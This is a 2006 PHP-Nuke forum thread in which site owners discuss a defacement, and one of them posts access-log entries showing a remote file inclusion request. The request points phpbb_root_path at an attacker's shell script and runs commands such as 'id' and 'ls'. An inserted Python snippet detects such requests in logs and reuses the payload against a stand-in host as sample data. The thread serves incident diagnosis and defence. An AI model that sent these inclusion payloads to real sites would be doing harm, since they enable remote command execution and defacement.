LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 3:30 pm

Raven,
Hey this is Scott. Been running the security patches you installed for months now and things are going great. No more admin issues etc. I run Nuke 7.0.
Today I'm not sure how they did it because my index.php file is OK, but if you load my site directly typing in I get a screen that says:
=====================
Hacked By GodSmacK
=====================
If I type
My site loads perfectly, as do all the other pages. How are they doing this and how can I correct it? PM me when you get a second.
Thanks,
Scott
gregexp (The Mouse Is Extension Of Arm)
Joined: Feb 21, 2006 Posts: 1472 Location: In front of a screen....HELP! lol
Posted: Thu Jun 08, 2006 3:43 pm

Check to see if there is an index.html, as it will try to find that first.
LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 3:45 pm

This post is probably in the wrong area for starters and I apologize for that.
Well, I kind of figured out what was changed.
My index.php files are fine, but somehow they changed my index.html file to this:
Code: Can't post the code, but it was changed.
Same question applies: how did they do that and how can I stop it?
Thanks,
Scott
LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 3:46 pm

Yep, that was it, but not sure how to keep them out.
kguske (Site Admin)
Joined: Jun 04, 2004 Posts: 4852
Posted: Thu Jun 08, 2006 3:47 pm

Do you know if the permissions were set to allow writing? Most likely, they scanned your site to find files that could be overwritten, then used another attack to overwrite the file.
LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 3:50 pm

I went back to my original backup of my site that I did two days ago and I did not have an index.html file in my backup.
Could they have inserted that?
I deleted that file and the site is back on track normally. Weird...
kguske (Site Admin)
Joined: Jun 04, 2004 Posts: 4852
Posted: Thu Jun 08, 2006 3:53 pm

Usually not without FTP or control panel access, unless you use a non-standard module that allows uploads.
gregexp (The Mouse Is Extension Of Arm)
Joined: Feb 21, 2006 Posts: 1472 Location: In front of a screen....HELP! lol
Posted: Thu Jun 08, 2006 4:13 pm

I'm not sure how, but I think they wrote some PHP code... fopen usually does the trick... and wrote to it. Do you allow anything to be uploaded to your site?
LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 4:29 pm

Yes, the only thing I allow to be uploaded are the avatars. Funny, this started to happen all of a sudden because I just turned on the upload avatar function.
Do you think that is causing the issue?
gregexp (The Mouse Is Extension Of Arm)
Joined: Feb 21, 2006 Posts: 1472 Location: In front of a screen....HELP! lol
Posted: Thu Jun 08, 2006 4:33 pm

I'm going to try a hack on my site to see.
LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 4:44 pm

Here is the log entry that showed up around the time it happened:
Code:
85.106.213.224
Get-Address
/modules/Forums/admin/index.php?phpbb_root_path=http%3A%2F%2Fexploitarsivi.atspace.com%2F030.txt%3Fcmd&act=ls&d=%2Fhome%2Fsweptlin%2Fpublic_html%2F&sort=0a
LeapingLizard (New Member)
Joined: Dec 11, 2005 Posts: 9
Posted: Thu Jun 08, 2006 4:52 pm

This is the last entry and it looks like this is the one that did it; maybe I shouldn't be posting this...:
Code:
85.106.213.224
/modules/Forums/admin/index.php?phpbb_root_path=http://exploitarsivi.atspace.com/030.txt?cmd=id

I did go ahead and ban their IP range.
85.106.128.0 - 85.106.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-alcatel
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ***@telekom.gov.tr
changed: ***@telekom.gov.tr 20051026
source: RIPE
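The two log entries above are the signature of a remote file inclusion attempt: a query parameter (here phpbb_root_path) whose value is a URL to an attacker-controlled file. The check below scans access-log lines for that pattern, also catching the percent-encoded and double-encoded forms; it is an added example, not code from this forum, Sentinel or PHP-Nuke, and its log lines, IP addresses, hostnames and watched-parameter list are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example (not the forum's or PHP-Nuke's code): flag access-log lines
# carrying remote-file-inclusion attempts like the phpbb_root_path requests
# quoted in this thread. The log lines below are constructed, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jun/2006:16:40:01 +0000] "GET /modules/Forums/admin/index.php?phpbb_root_path=http%3A%2F%2Fshell.invalid%2F030.txt%3Fcmd&act=ls HTTP/1.1" 200 512
203.0.113.5 - - [08/Jun/2006:16:41:09 +0000] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://shell.invalid/030.txt?cmd=id HTTP/1.1" 200 77
198.51.100.7 - - [08/Jun/2006:16:42:15 +0000] "GET /modules.php?name=Forums&file=viewtopic&t=42 HTTP/1.1" 200 9031
203.0.113.5 - - [08/Jun/2006:16:43:30 +0000] "GET /index.php?page=http%253A%252F%252Fshell.invalid%252Fx.txt HTTP/1.1" 200 10
"""

# Apache combined log: client IP first, then the quoted request line.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Parameter names this thread shows being abused; extend as needed (assumed list).
WATCHED_PARAMS = {"phpbb_root_path"}

# A decoded value that starts with a URL scheme, e.g. http:// or ftp://
REMOTE_URL = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding; double-encoding is a common evasion."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_indicators(target):
    """Return (param, decoded value) pairs for one request target such as
    /x.php?a=b whose value is a remote URL or whose name is watched."""
    hits = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            decoded = fully_unquote(value)
            if name in WATCHED_PARAMS or REMOTE_URL.match(decoded):
                hits.append((name, decoded))
    return hits

def scan_log(text):
    """Return (ip, target, indicators) for each log line that looks like RFI."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and (hits := rfi_indicators(m.group("target"))):
            findings.append((m.group("ip"), m.group("target"), hits))
    return findings
```

A hit on a watched parameter is worth alerting on even when the value is a local path, since the parameter should never be client-controlled at all.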
gregexp (The Mouse Is Extension Of Arm)
Joined: Feb 21, 2006 Posts: 1472 Location: In front of a screen....HELP! lol
Posted: Thu Jun 08, 2006 5:02 pm

After attempting that on my site... Sentinel caught me... with ease, and I tried to upload something to my avatars that was actually a script renamed, but it wouldn't take.
I tried every input on my site... and nothing, and I mean nothing, would take... Now I'm not very knowledgeable on hacks... but I can tell... no one will input a script that will function into any inputs I got... sorry to say... I'm at a dead end.
persona_non_grata
Posts: 0
Posted: Thu Jun 08, 2006 7:02 pm

Well, this is one of the most common they use...
but it's not only towards PHP-Nuke... it's targeted at phpBB standalone, PostNuke, My-Gallery, Gallery etc.
bugsTHoR (Worker)
Joined: Apr 05, 2006 Posts: 172
Posted: Wed Aug 16, 2006 3:06 pm

Is there a way of testing the security myself on my site so I know I can't be hacked anyway at all?
I got 7.6, Raven 2.2.2, all updates; it's catching a lot, but I want all holes filled (not mine lol).
The only add-ons I got installed are shout box 8.5 and doant o meter (not working as yet) and server monitor (game monitor).
evaders99 (Moderator)
Joined: Apr 30, 2004 Posts: 2845
Posted: Sat Aug 19, 2006 2:11 am

There are lots of vulnerabilities you can search for... we won't post them here.
bugsTHoR (Worker)
Joined: Apr 05, 2006 Posts: 172
Posted: Sun Aug 20, 2006 5:57 pm

Rgr that evaders99, wasn't asking for the code. I got me a hacker and all his codes thx since my asking, just to test... anyways,
I turned off Sentinel... AAhhh I hear you shout. Well, I switched database to one called catch_memy_hacker, with a 1 month old backup and all new folders he could play with. Insert really evil laugh**
.....It worked. He used lots of code through the address bar before he could get in (I will send you the printscreens/codes if ya really want it, to see if it's something new), only you guys though... he's no script kiddie, me thinks??? I think he knows exactly what he does himself.
His IP is 81.76.121.209 which is Leeds... but it's only his host IP, not his... how do I get him please? PM me if needed.
Guardian2003 (Site Admin)
Joined: Aug 28, 2003 Posts: 4816
Posted: Sun Aug 20, 2006 6:42 pm

You need to look closely at the string manipulation he used; you will probably find that he came from site x and connected with site y, which is compromised, and used that to eventually get to your site.
I'm seeing this more and more often.
The problem with this type of attack is that if you rely solely on the referer, it is going to give you the wrong data (site y in this example).
bugsTHoR (Worker)
Joined: Apr 05, 2006 Posts: 172
Posted: Sun Aug 20, 2006 10:18 pm

Rgr that, I banned this IP, but I want this guy really bad anyway, to catch him at all; I'll try anything for testing purposes.
montego (Site Admin)
Joined: Aug 29, 2004 Posts: 7452 Location: Arizona
Posted: Mon Aug 21, 2006 6:47 am

Maybe try adding a string in the string blocker. Problem is, though, they may even just change that as they use someone else's site they have compromised to issue a new attack. It is endless... all that "talent" wasted.
bugsTHoR (Worker)
Joined: Apr 05, 2006 Posts: 172
Posted: Tue Aug 22, 2006 5:24 pm

Well, I found out by pure chance that my abuse/abuse.html works lol